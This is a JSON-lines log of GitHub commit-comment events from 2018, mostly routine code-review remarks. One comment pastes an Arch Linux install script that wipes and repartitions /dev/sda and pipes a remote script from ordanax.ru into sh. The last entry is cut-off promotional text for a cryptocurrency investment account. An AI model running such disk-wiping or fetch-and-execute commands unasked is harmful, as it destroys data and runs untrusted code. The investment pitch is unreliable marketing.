{"id":"7983268890","type":"CommitCommentEvent","actor":{"login":"bouncyball-git"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29750410,"position":null,"line":null,"path":null,"commit_id":"043101c15f5b89f5a8b30219abaeaef5cb7456b9","created_at":"2018-07-18T14:17:38Z","updated_at":"2018-07-18T14:17:38Z","author_association":"COLLABORATOR","body":"Strange!!! I'm commenting lut line and uncommenting denoiser. Checking the lut check box, even loading the lut but nothing happens, e.g. \"if(processing->lut_on)\" block never executes."}},"created_at":"2018-07-18T14:17:38Z"}
{"id":"7983269462","type":"CommitCommentEvent","actor":{"login":"janstary"},"repo":{"name":"columbia-irt/rtptools"},"payload":{"comment":{"id":29750412,"position":null,"line":null,"path":null,"commit_id":"b362334560dc1020fddd44587f7a9be189da7d8a","created_at":"2018-07-18T14:17:43Z","updated_at":"2018-07-18T14:17:43Z","author_association":"CONTRIBUTOR","body":"My point is why are you introducing a new `start` variable in `main()`?\r\nWhy don't you fix `RD_header()` to read it into the `start` field of `RD_hdr_t` that already exists?"}},"created_at":"2018-07-18T14:17:43Z"}
{"id":"7983270340","type":"CommitCommentEvent","actor":{"login":"duncte123"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29750413,"position":null,"line":null,"path":null,"commit_id":"fe5c8595d1063824f122e1622c9ce54731666b6b","created_at":"2018-07-18T14:17:52Z","updated_at":"2018-07-18T14:17:52Z","author_association":"MEMBER","body":"I had it working since the start before your commit messed it up, so yes I changed my logger that you changed that I changed "}},"created_at":"2018-07-18T14:17:52Z"}
{"id":"7983270716","type":"CommitCommentEvent","actor":{"login":"rashingo"},"repo":{"name":"MikazukiKanade/Kanade-s-Soundcloud-Discord-Rich-Presence"},"payload":{"comment":{"id":29750414,"position":null,"line":null,"path":null,"commit_id":"52387ebeeb1e8c156aaab3c0536dd316c3789368","created_at":"2018-07-18T14:17:56Z","updated_at":"2018-07-18T14:17:56Z","author_association":"NONE","body":"Is it possible that you can allow the soundcloud images to pop up aswell?"}},"created_at":"2018-07-18T14:17:56Z"}
{"id":"7983272649","type":"CommitCommentEvent","actor":{"login":"picklechips"},"repo":{"name":"CGUC/grapp-client"},"payload":{"comment":{"id":29750419,"position":1,"line":30,"path":"ApiClient.js","commit_id":"0bc90daf70fdba39b3cf55e262c7812e898c7245","created_at":"2018-07-18T14:18:16Z","updated_at":"2018-07-18T14:18:16Z","author_association":"MEMBER","body":"I meant to just remove `reloadParent` from updating comments altogether, but this looks cleaner as a whole 👍 What I did before was sort of half-assed"}},"created_at":"2018-07-18T14:18:16Z"}
{"id":"7983273002","type":"CommitCommentEvent","actor":{"login":"jsquyres"},"repo":{"name":"open-mpi/ompi"},"payload":{"comment":{"id":29750421,"position":28,"line":640,"path":"opal/mca/btl/openib/btl_openib_component.c","commit_id":"4447738098b8f03b7ea9c05953a020bf29bc0be2","created_at":"2018-07-18T14:18:19Z","updated_at":"2018-07-18T14:18:19Z","author_association":"MEMBER","body":"@hppritcha Don't you at least want to look at the transport type to see if it's IB or IWARP?"}},"created_at":"2018-07-18T14:18:19Z"}
{"id":"7983277054","type":"CommitCommentEvent","actor":{"login":"phpmyadmin-bot"},"repo":{"name":"Piyush3079/phpmyadmin"},"payload":{"comment":{"id":29750433,"position":null,"line":null,"path":null,"commit_id":"fcb540f41052e1ab38202ba8aa1405ed5ee026c1","created_at":"2018-07-18T14:18:57Z","updated_at":"2018-07-18T14:18:57Z","author_association":"NONE","body":"<!-- PMABOT:SPACE -->\nThis commit contains trailing whitespace, what is prohibited in phpMyAdmin. Please check our [Developer guidelines](https://github.com/phpmyadmin/phpmyadmin/wiki/Developer_guidelines#Indentation) for more information.\n\nOffending files: js/src/common_params.php, js/src/messages.php"}},"created_at":"2018-07-18T14:18:57Z"}
{"id":"7983277300","type":"CommitCommentEvent","actor":{"login":"McAfeeAdminInstance2"},"repo":{"name":"McAfeeInst2Org1/newrepo"},"payload":{"comment":{"id":29750435,"position":1,"line":null,"path":"1531923537.53/github_test.txt","commit_id":"eecf8d4ae0fb32b3681b09ee7e0e46f0ebbd82ee","created_at":"2018-07-18T14:19:00Z","updated_at":"2018-07-18T14:19:00Z","author_association":"CONTRIBUTOR","body":"889976543"}},"created_at":"2018-07-18T14:19:00Z"}
{"id":"7983284153","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29750453,"position":15,"line":50,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T14:20:04Z","updated_at":"2018-07-18T14:20:04Z","author_association":"NONE","body":"publishPlane seems a more appropriate name"}},"created_at":"2018-07-18T14:20:04Z"}
{"id":"7983284515","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750456,"position":33,"line":33,"path":"compiler/psi/src/org/jetbrains/kotlin/psi/KtImportInfo.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:20:08Z","updated_at":"2018-07-18T14:20:08Z","author_association":"MEMBER","body":"```\r\nimportContent.fqName.takeUnless(FqName::isRoot)?.shortName()?.asString()\r\n```\r\nwould avoid creating a list"}},"created_at":"2018-07-18T14:20:08Z"}
{"id":"7983284659","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750457,"position":148,"line":148,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:20:09Z","updated_at":"2018-07-18T14:20:09Z","author_association":"NONE","body":"You don't need the {} here."}},"created_at":"2018-07-18T14:20:09Z"}
{"id":"7983284903","type":"CommitCommentEvent","actor":{"login":"ggboy-shakalaka"},"repo":{"name":"ggboy-shakalaka/utils"},"payload":{"comment":{"id":29750458,"position":4,"line":37,"path":"src/main/java/mustry/common/utils/array/ArrayUtil.java","commit_id":"61f67f393e046f7433f8380595cea694b1543843","created_at":"2018-07-18T14:20:11Z","updated_at":"2018-07-18T14:20:11Z","author_association":"OWNER","body":"123"}},"created_at":"2018-07-18T14:20:11Z"}
{"id":"7983288522","type":"CommitCommentEvent","actor":{"login":"carund"},"repo":{"name":"carund/arch_1.sh"},"payload":{"comment":{"id":29750467,"position":null,"line":null,"path":null,"commit_id":"436832254570e242f118f0541ee7ef2e303922e5","created_at":"2018-07-18T14:20:42Z","updated_at":"2018-07-18T14:20:42Z","author_association":"OWNER","body":"#!/bin/bash\r\n\r\nloadkeys ru\r\nsetfont cyr-sun16\r\necho 'Скрипт сделан на основе чеклиста edgar  по Установке ArchLinux'\r\necho 'Ссылка на чек лист есть в группе vk.com/arch4u'\r\n\r\necho '2.3 Синхронизация системных часов'\r\ntimedatectl set-ntp true\r\n\r\necho '2.4 создание разделов'\r\n(\r\n  echo o;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +100M;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +20G;\r\n\r\n  echo n;\r\n  echo;\r\n  echo;\r\n  echo;\r\n  echo +1024M;\r\n\r\n  echo n;\r\n  echo p;\r\n  echo;\r\n  echo;\r\n  echo a;\r\n  echo 1;\r\n\r\n  echo w;\r\n) | fdisk /dev/sda\r\n\r\necho 'Ваша разметка диска'\r\nfdisk -l\r\n\r\necho '2.4.2 Форматирование дисков'\r\nmkfs.ext2  /dev/sda1 -L boot\r\nmkfs.ext4  /dev/sda2 -L root\r\nmkswap /dev/sda3 -L swap\r\nmkfs.ext4  /dev/sda4 -L home\r\n\r\necho '2.4.3 Монтирование дисков'\r\nmount /dev/sda2 /mnt\r\nmkdir /mnt/{boot,home}\r\nmount /dev/sda1 /mnt/boot\r\nswapon /dev/sda3\r\nmount /dev/sda4 /mnt/home\r\n\r\necho '3.1 Выбор зеркал для загрузки. Ставим зеркало от Яндекс'\r\necho \"Server = http://mirror.yandex.ru/archlinux/\\$repo/os/\\$arch\" > /etc/pacman.d/mirrorlist\r\n\r\necho '3.2 Установка основных пакетов'\r\npacstrap /mnt base base-devel\r\n\r\necho '3.3 Настройка системы'\r\ngenfstab -pU /mnt >> /mnt/etc/fstab\r\n\r\narch-chroot /mnt sh -c \"$(curl -fsSL ordanax.ru/arch/arch_2.sh)\""}},"created_at":"2018-07-18T14:20:42Z"}
{"id":"7983295635","type":"CommitCommentEvent","actor":{"login":"AnnaGuilger"},"repo":{"name":"AnnaGuilger/curso-javascript-ninja"},"payload":{"comment":{"id":29750488,"position":32,"line":32,"path":"challenge-01/README.md","commit_id":"d2134407a36be35be83cde67758afebef555ad0e","created_at":"2018-07-18T14:21:49Z","updated_at":"2018-07-18T14:21:49Z","author_association":"OWNER","body":"soma == myvar"}},"created_at":"2018-07-18T14:21:49Z"}
{"id":"7983298337","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750494,"position":100,"line":100,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:22:13Z","updated_at":"2018-07-18T14:22:13Z","author_association":"NONE","body":"Er, I mean if you reorder the functions that make use of bus_dma_xen_impl so that all of them are below the definition of bus_dma_xen_impl you won't need this forward declaration, but that might not be possible."}},"created_at":"2018-07-18T14:22:13Z"}
{"id":"7983303168","type":"CommitCommentEvent","actor":{"login":"Zitman"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29750503,"position":null,"line":null,"path":null,"commit_id":"14e11134a3997f5ed00883856f32dde579137d27","created_at":"2018-07-18T14:22:57Z","updated_at":"2018-07-18T14:22:57Z","author_association":"NONE","body":"Hi all,\r\n\r\nI am having a major problem with the rental form.  When I post the NewRentalsController is throwing a **System.Reflection.TargetException: 'Non-static method requires a target.'** exception on the first line of the function:\r\n```\r\nvar customer = _context.Customers.Single(\r\n                c => c.Id == newRental.CustomerId);\r\n```\r\n\r\nI believe this is because the newRental being passed in is null.\r\n\r\nIf I clone the code from this commit then it works fine but I would love to get to the bottom of the issue for my own sanity.  Any help would be appreciated\r\n\r\nZ"}},"created_at":"2018-07-18T14:22:57Z"}
{"id":"7983304896","type":"CommitCommentEvent","actor":{"login":"carund"},"repo":{"name":"carund/arch_2.sh"},"payload":{"comment":{"id":29750506,"position":null,"line":null,"path":null,"commit_id":"dc1a7c9877195826857167734e8d855551593e00","created_at":"2018-07-18T14:23:14Z","updated_at":"2018-07-18T14:23:14Z","author_association":"OWNER","body":"#!/bin/bash\r\necho 'Прписываем имя компьютера'\r\necho \"ked-pc\" > /etc/hostname\r\nln -svf /usr/share/zoneinfo/Asia/Yekaterinburg /etc/localtime\r\n\r\necho '3.4 Добавляем русскую локаль системы'\r\necho \"en_US.UTF-8 UTF-8\" > /etc/locale.gen\r\necho \"ru_RU.UTF-8 UTF-8\" >> /etc/locale.gen \r\n\r\necho 'Обновим текущую локаль системы'\r\nlocale-gen\r\n\r\necho 'Указываем язык системы'\r\necho 'LANG=\"ru_RU.UTF-8\"' > /etc/locale.conf\r\n\r\necho 'Вписываем KEYMAP=ru FONT=cyr-sun16'\r\necho 'KEYMAP=ru' >> /etc/vconsole.conf\r\necho 'FONT=cyr-sun16' >> /etc/vconsole.conf\r\n\r\necho 'Создадим загрузочный RAM диск'\r\nmkinitcpio -p linux\r\n\r\necho 'Создаем root пароль'\r\npasswd\r\n\r\necho '3.5 Устанавливаем загрузчик'\r\npacman -Syy\r\npacman -S grub --noconfirm \r\ngrub-install /dev/sda\r\n\r\necho 'Обновляем grub.cfg'\r\ngrub-mkconfig -o /boot/grub/grub.cfg\r\n\r\necho 'Ставим программу для Wi-fi'\r\npacman -S dialog wpa_supplicant --noconfirm \r\n\r\necho 'Добавляем пользователя'\r\nuseradd -m -g users -G wheel -s /bin/bash edgar\r\n\r\necho 'Устанавливаем пароль пользователя'\r\npasswd edgar\r\necho 'Устанавливаем SUDO'\r\necho '%wheel ALL=(ALL) ALL' >> /etc/sudoers\r\n\r\necho 'Раскомментируем репозиторий multilib Для работы 32-битных приложений в 64-битной системе.'\r\necho '[multilib]' >> /etc/pacman.conf\r\necho 'Include = /etc/pacman.d/mirrorlist' >> /etc/pacman.conf\r\npacman -Syy\r\n\r\necho \"Куда устанавливем Arch Linux на виртуальную машину?\"\r\nread -p \"1 - Да, 0 - Нет: \" vm_setting\r\nif [[ $vm_setting == 0 ]]; then\r\n  gui_install=\"xorg-server xorg-drivers xorg-xinit\"\r\nelif [[ $vm_setting == 1 ]]; then\r\n  gui_install=\"xorg-server xorg-drivers xorg-xinit virtualbox-guest-utils\"\r\nfi\r\n\r\necho 'Ставим иксы и драйвера'\r\npacman -S $gui_install\r\n\r\necho 'Ставим Xfce, LXDM и сеть'\r\npacman -S xfce4 xfce4-goodies lxdm networkmanager network-manager-applet ppp --noconfirm\r\n\r\necho 'Ставим шрифты'\r\npacman -S ttf-liberation ttf-dejavu --noconfirm \r\n\r\necho 'Подключаем автозагрузку менеджера входа и интернет'\r\nsystemctl enable lxdm NetworkManager\r\n\r\necho 'Перезагрузка. После перезагрузки заходим под пользователем'\r\nexit\r\nread -p \"Пауза 3 ceк.\" -t 3\r\nreboot"}},"created_at":"2018-07-18T14:23:14Z"}
{"id":"7983344047","type":"CommitCommentEvent","actor":{"login":"timtim7373"},"repo":{"name":"garantica/dev.garantica.org"},"payload":{"comment":{"id":29750597,"position":55,"line":522,"path":"views/js/trades/tradesController.js","commit_id":"c59eb0a2729949b509b39b1320d4e7ea9f279a27","created_at":"2018-07-18T14:29:12Z","updated_at":"2018-07-18T14:29:12Z","author_association":"CONTRIBUTOR","body":"a"}},"created_at":"2018-07-18T14:29:12Z"}
{"id":"7983344344","type":"CommitCommentEvent","actor":{"login":"36864"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29750599,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-18T14:29:15Z","updated_at":"2018-07-18T14:29:15Z","author_association":"CONTRIBUTOR","body":"The docblock already lists the parameter as `dynamic`, which is explicitly different from `array|string` which is what your usage seems to suggest you were using it as."}},"created_at":"2018-07-18T14:29:15Z"}
{"id":"7983345814","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750605,"position":141,"line":141,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:29:28Z","updated_at":"2018-07-18T14:29:28Z","author_association":"NONE","body":"Can't you just save the operations in newtag->common.impl and avoid the call to bus_dma_tag_create below?\r\n\r\nThe hooks in impl returned by common_bus_dma_tag_create should be the generic ones which are the ones that you want to use?"}},"created_at":"2018-07-18T14:29:28Z"}
{"id":"7983347522","type":"CommitCommentEvent","actor":{"login":"erimatnor"},"repo":{"name":"Ngalstyan4/timescaledb"},"payload":{"comment":{"id":29750610,"position":102,"line":102,"path":"src/ddl_utils.c","commit_id":"13073d210c2bffec9a0bd4722d796a3684816faa","created_at":"2018-07-18T14:29:43Z","updated_at":"2018-07-18T14:29:43Z","author_association":"NONE","body":"It doesn't look like `hypertable_get_all` is using the cache, so no need to pin it for that reason."}},"created_at":"2018-07-18T14:29:43Z"}
{"id":"7983350237","type":"CommitCommentEvent","actor":{"login":"sharkinsspatial"},"repo":{"name":"AnkitaKhurana/oam-admin"},"payload":{"comment":{"id":29750618,"position":19,"line":1,"path":"src/components/Title.js","commit_id":"73914a06ff52c72e4eaf2b46a48ecf8435410857","created_at":"2018-07-18T14:30:08Z","updated_at":"2018-07-18T14:30:08Z","author_association":"COLLABORATOR","body":"Your functional components should also have PropTypes checking for validation."}},"created_at":"2018-07-18T14:30:08Z"}
{"id":"7983350594","type":"CommitCommentEvent","actor":{"login":"gibsson"},"repo":{"name":"boundarydevices/meta-freescale-3rdparty"},"payload":{"comment":{"id":29750620,"position":9,"line":34,"path":"conf/machine/nitrogen8m.conf","commit_id":"f3813f0454c62c6afb05eccfb0c8f7ee7828849e","created_at":"2018-07-18T14:30:11Z","updated_at":"2018-07-18T14:30:11Z","author_association":"MEMBER","body":"So I confirm this patch is needed for master. (not my setup at first, was using master-next from BD, which doesn't include the incriminating patch): https://github.com/boundarydevices/meta-freescale/commits/master-next"}},"created_at":"2018-07-18T14:30:11Z"}
{"id":"7983351897","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750626,"position":153,"line":153,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:30:22Z","updated_at":"2018-07-18T14:30:22Z","author_association":"NONE","body":"Indentation looks weird here, but I don't know if that's because of the github UI. Can you please make sure the indentation follows the style(9) guidelines?"}},"created_at":"2018-07-18T14:30:22Z"}
{"id":"7983354454","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750634,"position":191,"line":191,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:30:44Z","updated_at":"2018-07-18T14:30:44Z","author_association":"NONE","body":"This comment can probably fit in 2 lines."}},"created_at":"2018-07-18T14:30:44Z"}
{"id":"7983355677","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29750637,"position":28,"line":58,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T14:30:55Z","updated_at":"2018-07-18T14:30:55Z","author_association":"NONE","body":"It's not a good programming practice to store the return of a function in one of its parameters because the code becomes less readable, and bugs become harder to find. You should create a new variable for the return, and the name should give a hint of what it is, e.g.: sensor_obs_id"}},"created_at":"2018-07-18T14:30:55Z"}
{"id":"7983360437","type":"CommitCommentEvent","actor":{"login":"tripodsan"},"repo":{"name":"adobe/helix-cli"},"payload":{"comment":{"id":29750645,"position":23,"line":187,"path":"src/init.cmd.js","commit_id":"034d0a79ce3b6439a800aa31a1a60c7c9ebedbc1","created_at":"2018-07-18T14:31:36Z","updated_at":"2018-07-18T14:31:36Z","author_association":"CONTRIBUTOR","body":"why not just execute `initNpm` before `initgit` ? then it is automatically added."}},"created_at":"2018-07-18T14:31:36Z"}
{"id":"7983363646","type":"CommitCommentEvent","actor":{"login":"pavanblore11"},"repo":{"name":"pavanblore11/SFDCGITHUBDemo"},"payload":{"comment":{"id":29750655,"position":null,"line":null,"path":null,"commit_id":"8d5eb5a20a358929947fd6c722bfc9fb2b59f84a","created_at":"2018-07-18T14:32:06Z","updated_at":"2018-07-18T14:32:06Z","author_association":"OWNER","body":"Yeah.. well done boy.. file recieved"}},"created_at":"2018-07-18T14:32:06Z"}
{"id":"7983363970","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.05_06"},"payload":{"comment":{"id":29750656,"position":61,"line":80,"path":"Logic.Task2/Polynomial .cs","commit_id":"ff312a7f606dadc98033bebd3941083bfa95f833","created_at":"2018-07-18T14:32:09Z","updated_at":"2018-07-18T14:32:09Z","author_association":"NONE","body":"понимаю, что переменная с - локальная, но одобрить такое имя для переменной со смыслом не могу"}},"created_at":"2018-07-18T14:32:09Z"}
{"id":"7983367696","type":"CommitCommentEvent","actor":{"login":"browner12"},"repo":{"name":"laravel/framework"},"payload":{"comment":{"id":29750669,"position":null,"line":null,"path":null,"commit_id":"57d7b1fef9fa48899b99dd240d89a2ef4cbafc4b","created_at":"2018-07-18T14:32:42Z","updated_at":"2018-07-18T14:32:42Z","author_association":"CONTRIBUTOR","body":"absolutely right. I had to learn how the splat actually passes through.\r\n\r\nhere is the only documentation I could find for the method:\r\n\r\nhttps://laravel.com/docs/5.6/requests#request-path-and-method\r\n\r\nIt is a little lacking, and doesn't even discuss checking multiple paths.\r\n\r\nWhile going forward I would say it should be used dynamically, I would say this is a breaking change that should not have been merged in a point release.\r\n\r\n"}},"created_at":"2018-07-18T14:32:42Z"}
{"id":"7983370487","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750678,"position":95,"line":118,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/lazy/LazyImportScope.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:33:09Z","updated_at":"2018-07-18T14:33:09Z","author_association":"MEMBER","body":"I propose to extract this to an abstract `val lookupLocation` in `KtImportInfo`"}},"created_at":"2018-07-18T14:33:09Z"}
{"id":"7983373905","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29750686,"position":153,"line":153,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T14:33:41Z","updated_at":"2018-07-18T14:33:41Z","author_association":"OWNER","body":"Ok, I'll take a look there and figure it out"}},"created_at":"2018-07-18T14:33:41Z"}
{"id":"7983379146","type":"CommitCommentEvent","actor":{"login":"naveenreddymanukonda"},"repo":{"name":"gramener/dataaudit"},"payload":{"comment":{"id":29750697,"position":99,"line":205,"path":"dataaudit.py","commit_id":"ef61bf5f2e5a6ad4296d9a1ae4dd64b373b98fd4","created_at":"2018-07-18T14:34:29Z","updated_at":"2018-07-18T14:34:29Z","author_association":"NONE","body":"@pratapvardhan added doc string"}},"created_at":"2018-07-18T14:34:29Z"}
{"id":"7983379989","type":"CommitCommentEvent","actor":{"login":"hejamarcus"},"repo":{"name":"tollyx/MOAS-LMS"},"payload":{"comment":{"id":29750699,"position":null,"line":null,"path":null,"commit_id":"dc15b1059f5934a2844a9d7a28148361ba73f546","created_at":"2018-07-18T14:34:37Z","updated_at":"2018-07-18T14:34:37Z","author_association":"COLLABORATOR","body":"Ska ActivityType vara en sträng?"}},"created_at":"2018-07-18T14:34:37Z"}
{"id":"7983384556","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.05_06"},"payload":{"comment":{"id":29750711,"position":null,"line":null,"path":null,"commit_id":"ff312a7f606dadc98033bebd3941083bfa95f833","created_at":"2018-07-18T14:35:19Z","updated_at":"2018-07-18T14:35:19Z","author_association":"NONE","body":"Не нашла статический конструктор в полиноме - поэтому не понятно, как мы можем выбирать точность сравнения вещественных значений,  равны ли 0.9999999 и 1.0?"}},"created_at":"2018-07-18T14:35:19Z"}
{"id":"7983385591","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750712,"position":85,"line":111,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/lazy/LazyImportScope.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:35:29Z","updated_at":"2018-07-18T14:35:29Z","author_association":"MEMBER","body":"Maybe this should remain `HashMultimap<String, KtImportDirective>` and checking `is KtImportDirective` should happen only once on `put` instead of twice on `get`"}},"created_at":"2018-07-18T14:35:29Z"}
{"id":"7983389053","type":"CommitCommentEvent","actor":{"login":"xuopled"},"repo":{"name":"xuopled/react-google-places-suggest"},"payload":{"comment":{"id":29750726,"position":null,"line":null,"path":null,"commit_id":"abe184e15d19d6799a99f0b06c0726b07270394b","created_at":"2018-07-18T14:36:00Z","updated_at":"2018-07-18T14:36:00Z","author_association":"OWNER","body":"Of course, I forgot! It should be ok now :)"}},"created_at":"2018-07-18T14:36:00Z"}
{"id":"7983389668","type":"CommitCommentEvent","actor":{"login":"AnzhelikaKravchuk"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.05_06"},"payload":{"comment":{"id":29750727,"position":null,"line":null,"path":null,"commit_id":"ff312a7f606dadc98033bebd3941083bfa95f833","created_at":"2018-07-18T14:36:07Z","updated_at":"2018-07-18T14:36:07Z","author_association":"NONE","body":"не хватает методов умножения полинома на число и числа на полином, сложения полинома с числом и наоборот"}},"created_at":"2018-07-18T14:36:07Z"}
{"id":"7983389716","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"tBlabs/CV"},"payload":{"comment":{"id":29750728,"position":45,"line":69,"path":"README.md","commit_id":"90c0ff35fe575cae0704b8dee027250969bc75c5","created_at":"2018-07-18T14:36:07Z","updated_at":"2018-07-18T14:36:07Z","author_association":"NONE","body":"Moja ulubiona część 😄 "}},"created_at":"2018-07-18T14:36:07Z"}
{"id":"7983390910","type":"CommitCommentEvent","actor":{"login":"carlasp"},"repo":{"name":"awsdocs/iam-user-guide"},"payload":{"comment":{"id":29750729,"position":null,"line":null,"path":null,"commit_id":"64aa95d08c0ce98ca64c99e210ecddcd6bb9b0d4","created_at":"2018-07-18T14:36:17Z","updated_at":"2018-07-18T14:36:17Z","author_association":"CONTRIBUTOR","body":"The links to ServiceNow's knowledgebase were problematic, so I had to rewrite it a bit.  "}},"created_at":"2018-07-18T14:36:17Z"}
{"id":"7983393076","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29750736,"position":66,"line":96,"path":"compiler/frontend/src/org/jetbrains/kotlin/resolve/lazy/LazyImportScope.kt","commit_id":"acede8b1efb020bae97d3fd1895f5689d104fa10","created_at":"2018-07-18T14:36:36Z","updated_at":"2018-07-18T14:36:36Z","author_association":"MEMBER","body":"Doesn't look like there's a point in force-resolving default imports, maybe leave `KtImportDirective` here?"}},"created_at":"2018-07-18T14:36:36Z"}
{"id":"7983398375","type":"CommitCommentEvent","actor":{"login":"EduFdez"},"repo":{"name":"karnikram/autocalib-sensor-extrinsics"},"payload":{"comment":{"id":29750745,"position":121,"line":153,"path":"gui/core_gui/CCalibFromPlanesGui.cpp","commit_id":"ba670c2fd1fc84543429452ead9a7ade1b35b311","created_at":"2018-07-18T14:37:25Z","updated_at":"2018-07-18T14:37:25Z","author_association":"NONE","body":"Normally, if you know the final size of the vector where you are doing push_back, then it's recommended to do a resize at the beginning, and then access each element of the vector. It's quicker because push_back needs to check (and arrange) the memory before resizing."}},"created_at":"2018-07-18T14:37:25Z"}
{"id":"7983399035","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29750747,"position":null,"line":null,"path":null,"commit_id":"043101c15f5b89f5a8b30219abaeaef5cb7456b9","created_at":"2018-07-18T14:37:30Z","updated_at":"2018-07-18T14:37:30Z","author_association":"COLLABORATOR","body":"😄 then it works... please wait some minutes... 1frame needs around 3min on my system! And multiprocessing does not work really... that means it works, but output image is wrong - there are boxes. These boxes are gone at singlethreading."}},"created_at":"2018-07-18T14:37:30Z"}
{"id":"7983399966","type":"CommitCommentEvent","actor":{"login":"tehsphinx"},"repo":{"name":"raceresult/gpxgo"},"payload":{"comment":{"id":29750751,"position":6,"line":427,"path":"gpx/converters.go","commit_id":"dfd674473b91c9900b1a9ac54452e180292b7bf4","created_at":"2018-07-18T14:37:38Z","updated_at":"2018-07-18T14:37:38Z","author_association":"NONE","body":"Sure! what about all the other changes? Mainly satisfying linters but some changes are not uncritical. \r\n- shadowing standard library package name \"bytes\"\r\n- incorrect string formatting `fmt.Printf(\"#d -> %v\\n\", pointNo, point.Timestamp)`"}},"created_at":"2018-07-18T14:37:38Z"}
{"id":"7983400444","type":"CommitCommentEvent","actor":{"login":"loumalouomega"},"repo":{"name":"KratosMultiphysics/Kratos"},"payload":{"comment":{"id":29750752,"position":4,"line":147,"path":"kratos/utilities/auxilary_global_master_slave_relation.h","commit_id":"ee8a527e7c6d74dfab1f81bf24285991fdc1cd4e","created_at":"2018-07-18T14:37:43Z","updated_at":"2018-07-18T14:37:43Z","author_association":"MEMBER","body":"Can you use the KRATOS_INFO(\"\") ?"}},"created_at":"2018-07-18T14:37:43Z"}
{"id":"7983405041","type":"CommitCommentEvent","actor":{"login":"fzieris"},"repo":{"name":"saros-project/saros"},"payload":{"comment":{"id":29750757,"position":3,"line":2,"path":"docs/_config.yml","commit_id":"eff0741d06e7311b50088478dfbf51b7ab3c2471","created_at":"2018-07-18T14:38:22Z","updated_at":"2018-07-18T14:38:22Z","author_association":"MEMBER","body":"\"Programming\""}},"created_at":"2018-07-18T14:38:22Z"}
{"id":"7983405678","type":"CommitCommentEvent","actor":{"login":"EbanSzelesi"},"repo":{"name":"EbanSzelesi/10x-Growth-Account"},"payload":{"comment":{"id":29750759,"position":null,"line":null,"path":null,"commit_id":"1f6dd0c3245ea8094f18172989098fa616bedf2a","created_at":"2018-07-18T14:38:28Z","updated_at":"2018-07-18T14:38:28Z","author_association":"OWNER","body":"Want to invest in Cryptocurrency, but don’t know how? \r\n\r\nThe Premier Cryptocurrency Account ‘10x Growth Account’ offers secure and easy access to Cryptocurrency, this fully managed account invests in the top 20 performing Cryptocurrencies to diversify the investment and mitigate the risk. \r\n\r\nThe 10x Growth Account is an opportunity to access the world of Cryptocurrency and benefit from a 24/7 fully managed portfolio of Cryptocurrency which is managed by a world class team of experts who have been managing Cryptocurrency portfolios since 2011. This removes the complexity surrounding Crypto investing alongside removing the difficulty of deciding what currency to buy and when, all from a fully transparent and easy to use platform, with the highest levels of security. \r\n\r\nThis opportunity provides you simple access to the world of cryptocurrency with the unique benet of a collaboration with the only UK-based Cryptocurrency exchange, providing security under UK law.  \r\nNew accounts 